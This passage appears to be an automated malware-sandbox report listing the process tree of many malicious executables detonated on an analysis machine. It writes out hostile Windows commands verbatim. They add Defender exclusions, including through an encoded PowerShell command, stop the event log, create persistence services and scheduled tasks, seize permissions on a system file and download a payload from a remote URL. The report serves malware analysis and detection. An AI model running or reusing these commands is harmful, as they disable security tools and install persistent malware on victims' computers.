    - Command and Scripting Interpreter: PowerShell

[6] C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

[5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'csrss.exe'
    - Command and Scripting Interpreter: PowerShell

[3] C:\Users\Admin\AppData\Local\Temp\a\csrss.exe
    "C:\Users\Admin\AppData\Local\Temp\a\csrss.exe"
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx

[4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\csrss.exe'
    - Command and Scripting Interpreter: PowerShell

[4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'csrss.exe'
    - Command and Scripting Interpreter: PowerShell

[4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\csrss.exe'
    - Command and Scripting Interpreter: PowerShell

[5] C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

[4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'csrss.exe'
    - Command and Scripting Interpreter: PowerShell

[3] C:\Users\Admin\AppData\Local\Temp\a\SrbijaSetupHokej.exe
    "C:\Users\Admin\AppData\Local\Temp\a\SrbijaSetupHokej.exe"
    - Executes dropped EXE

[4] C:\Users\Admin\AppData\Local\Temp\is-SHKC2.tmp\SrbijaSetupHokej.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-SHKC2.tmp\SrbijaSetupHokej.tmp" /SL5="$70256,3939740,937984,C:\Users\Admin\AppData\Local\Temp\a\SrbijaSetupHokej.exe"
    - Executes dropped EXE

[3] C:\Users\Admin\AppData\Local\Temp\a\GoogleUpdateTaskMachineQCW.exe
    "C:\Users\Admin\AppData\Local\Temp\a\GoogleUpdateTaskMachineQCW.exe"
    - Drops file in Drivers directory
    - Executes dropped EXE

[4] C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

[5] C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

[4] C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

[4] C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

[5] C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

[4] C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

[4] C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQCW"
    - Launches sc.exe

[5] C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

[4] C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQCW" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
    - Launches sc.exe

[4] C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    - Launches sc.exe

[5] C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

[4] C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQCW"
    - Launches sc.exe

[3] C:\Users\Admin\AppData\Local\Temp\a\gywervcyuj.exe
    "C:\Users\Admin\AppData\Local\Temp\a\gywervcyuj.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage

[4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "C:\Users\Admin\AppData\Local\Temp\a\gywervcyuj.exe"

[3] C:\Users\Admin\AppData\Local\Temp\a\ngown.exe
    "C:\Users\Admin\AppData\Local\Temp\a\ngown.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage

[4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "C:\Users\Admin\AppData\Local\Temp\a\ngown.exe"

[3] C:\Users\Admin\AppData\Local\Temp\a\gHIvTf22qvmZjum.exe
    "C:\Users\Admin\AppData\Local\Temp\a\gHIvTf22qvmZjum.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext

[4] C:\Users\Admin\AppData\Local\Temp\a\gHIvTf22qvmZjum.exe
    "C:\Users\Admin\AppData\Local\Temp\a\gHIvTf22qvmZjum.exe"
    - Executes dropped EXE

[3] C:\Users\Admin\AppData\Local\Temp\a\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Setup.exe"
    - Checks computer location settings
    - Executes dropped EXE
    - Checks processor information in registry

[4] C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KJJJKFIIIJJJ" & exit

[5] C:\Windows\SysWOW64\timeout.exe
    timeout /t 10
    - Delays execution with timeout.exe

[3] C:\Users\Admin\AppData\Local\Temp\a\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"
    - Drops startup file
    - Executes dropped EXE

[3] C:\Users\Admin\AppData\Local\Temp\a\crt.exe
    "C:\Users\Admin\AppData\Local\Temp\a\crt.exe"
    - Executes dropped EXE

[4] C:\Users\Admin\AppData\Local\Temp\is-BTJEF.tmp\crt.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-BTJEF.tmp\crt.tmp" /SL5="$70292,4508472,54272,C:\Users\Admin\AppData\Local\Temp\a\crt.exe"
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of FindShellTrayWindow

[5] C:\Users\Admin\AppData\Local\Submore Media Player\submoremediaplayer32.exe
    "C:\Users\Admin\AppData\Local\Submore Media Player\submoremediaplayer32.exe" -i
    - Executes dropped EXE

[5] C:\Users\Admin\AppData\Local\Submore Media Player\submoremediaplayer32.exe
    "C:\Users\Admin\AppData\Local\Submore Media Player\submoremediaplayer32.exe" -s
    - Executes dropped EXE

[3] C:\Users\Admin\AppData\Local\Temp\a\oiii.exe
    "C:\Users\Admin\AppData\Local\Temp\a\oiii.exe"
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Program Files directory

[4] C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" cmd /c takeown /f "C:\Program Files\Windows Media Player\wmpnetwk.exe" && icacls "C:\Program Files\Windows Media Player\wmpnetwk.exe" /grant administrators:F

[5] C:\Windows\system32\takeown.exe
    takeown /f "C:\Program Files\Windows Media Player\wmpnetwk.exe"
    - Possible privilege escalation attempt
    - Modifies file permissions

[5] C:\Windows\system32\icacls.exe
    icacls "C:\Program Files\Windows Media Player\wmpnetwk.exe" /grant administrators:F
    - Possible privilege escalation attempt
    - Modifies file permissions

[4] C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" cmd /c sc create "Accecss Auto Connetcion Manager" binPath= "C:\Program Files\Windows Media Player\wmixedwk.exe" START= auto DISPLAYNAME= "WebServer" TYPE= own

[5] C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

[5] C:\Windows\system32\sc.exe
    sc create "Accecss Auto Connetcion Manager" binPath= "C:\Program Files\Windows Media Player\wmixedwk.exe" START= auto DISPLAYNAME= "WebServer" TYPE= own
    - Launches sc.exe

[4] C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\kkxqbh.bat" "

[5] C:\Windows\system32\PING.EXE
    ping 127.0.0.1 -n 3
    - Runs ping.exe

[3] C:\Users\Admin\AppData\Local\Temp\a\conhost.exe
    "C:\Users\Admin\AppData\Local\Temp\a\conhost.exe"
    - Checks computer location settings

[4] C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

[5] C:\Windows\system32\mode.com
    mode 65,10

[5] C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e file.zip -p563741341569714296105326100 -oextracted
    - Loads dropped DLL

[5] C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e extracted/file_2.zip -oextracted
    - Loads dropped DLL

[5] C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e extracted/file_1.zip -oextracted
    - Loads dropped DLL

[5] C:\Windows\system32\attrib.exe
    attrib +H "svcshost.exe"
    - Views/modifies file attributes

[5] C:\Users\Admin\AppData\Local\Temp\main\svcshost.exe
    "svcshost.exe"
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C powershell -EncodedCommand "PAAjAHUAVABIAFUAWgBNAFMATQBIAHAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwAxAHcAMgBDACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAFYAeABNAGEAYwBvAGgAMwBoAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAWQBPADcARAA3AEEAWQBTACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off6⤵
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHUAVABIAFUAWgBNAFMATQBIAHAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwAxAHcAMgBDACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAFYAeABNAGEAYwBvAGgAMwBoAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAWQBPADcARAA3AEEAWQBTACMAPgA="7⤵
    - Command and Scripting Interpreter: PowerShell

[6] C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

[6] C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk3832" /TR "C:\ProgramData\Dllhost\dllhost.exe"

[7] C:\Windows\SysWOW64\schtasks.exe
    SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk3832" /TR "C:\ProgramData\Dllhost\dllhost.exe"
    - Creates scheduled task(s)

[3] C:\Users\Admin\AppData\Local\Temp\a\sdf34ert3etgrthrthfghfghjfgh.exe
    "C:\Users\Admin\AppData\Local\Temp\a\sdf34ert3etgrthrthfghfghjfgh.exe"
    - Suspicious use of SetThreadContext

[4] C:\Users\Admin\AppData\Local\Temp\katA5E1.tmp
    C:\Users\Admin\AppData\Local\Temp\katA5E1.tmp

[3] C:\Users\Admin\AppData\Local\Temp\a\o2i3jroi23joj23ikrjokij3oroi.exe
    "C:\Users\Admin\AppData\Local\Temp\a\o2i3jroi23joj23ikrjokij3oroi.exe"

[4] C:\Users\Admin\AppData\Local\Temp\katAC98.tmp
    C:\Users\Admin\AppData\Local\Temp\katAC98.tmp

[3] C:\Users\Admin\AppData\Local\Temp\a\inte.exe
    "C:\Users\Admin\AppData\Local\Temp\a\inte.exe"

[4] C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im "inte.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\a\inte.exe" & exit

[5] C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

[5] C:\Windows\SysWOW64\taskkill.exe
    taskkill /im "inte.exe" /f
    - Kills process with taskkill

[3] C:\Users\Admin\AppData\Local\Temp\a\vpn-1002.exe
    "C:\Users\Admin\AppData\Local\Temp\a\vpn-1002.exe"

[4] C:\Windows\SysWOW64\cmd.exe
    "cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsoADE2.tmp\abc.bat"

[5] C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

[5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002','stat')"
    - Command and Scripting Interpreter: PowerShell

[3] C:\Users\Admin\AppData\Local\Temp\a\tdrpload.exe
    "C:\Users\Admin\AppData\Local\Temp\a\tdrpload.exe"

[4] C:\Windows\sysblardsv.exe
    C:\Windows\sysblardsv.exe

[5] C:\Users\Admin\AppData\Local\Temp\545918409.exe
    C:\Users\Admin\AppData\Local\Temp\545918409.exe

[6] C:\Windows\syslmgrsvc.exe
    C:\Windows\syslmgrsvc.exe

[7] C:\Users\Admin\AppData\Local\Temp\2869931055.exe
    C:\Users\Admin\AppData\Local\Temp\2869931055.exe

[3] C:\Users\Admin\AppData\Local\Temp\a\print.exe
    "C:\Users\Admin\AppData\Local\Temp\a\print.exe"
-
C:\Users\Admin\AppData\Local\Temp\a\222.exe"C:\Users\Admin\AppData\Local\Temp\a\222.exe"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"4⤵
-
C:\Windows\system32\mode.commode 65,105⤵
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e file.zip -p209313910271864811381312692 -oextracted5⤵
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_8.zip -oextracted5⤵
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_7.zip -oextracted5⤵
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_6.zip -oextracted5⤵
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_5.zip -oextracted5⤵
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_4.zip -oextracted5⤵
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_3.zip -oextracted5⤵
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_2.zip -oextracted5⤵
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_1.zip -oextracted5⤵
-
C:\Windows\system32\attrib.exeattrib +H "Installer.exe"5⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\main\Installer.exe"Installer.exe"5⤵
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force6⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart6⤵
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart7⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 06⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 06⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 06⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 06⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "OARKQOLE"6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "OARKQOLE" binpath= "C:\ProgramData\xiyorhiuewkj\adwmbjfsmbak.exe" start= "auto"6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "OARKQOLE"6⤵
- Launches sc.exe
-
C:\Users\Admin\AppData\Local\Temp\a\Pirate_24S.exe"C:\Users\Admin\AppData\Local\Temp\a\Pirate_24S.exe"3⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.vbs"4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.cmd" "5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\reg.exeC:\Windows\Sysnative\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName6⤵
-
C:\Windows\SysWOW64\find.exefind /i "Windows 7"6⤵
-
C:\Windows\SysWOW64\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PoseidonSense.url" & echo URL="C:\Users\Admin\AppData\Local\GreenTech Innovations\PoseidonSense.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PoseidonSense.url" & exit2⤵
- Drops startup file
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\18721\jsc.exeC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\18721\jsc.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3052 -ip 30521⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3912,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=3900 /prefetch:81⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4948 -ip 49481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2676 -ip 26761⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=4144,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=3212 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=3952,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=4952 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --field-trial-handle=3984,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=5292 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=5308,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=5472 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=5428,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=5624 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --field-trial-handle=5500,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=5624 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --field-trial-handle=5852,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=5864 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6444,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=6468 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6464,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=6596 /prefetch:81⤵
- Modifies registry class
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6332,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=6680 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --field-trial-handle=6252,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=6848 /prefetch:11⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 6428 -ip 64281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5680 -ip 56801⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS782F.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS782F.tmp\Install.exe it /giAdidFZjj 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
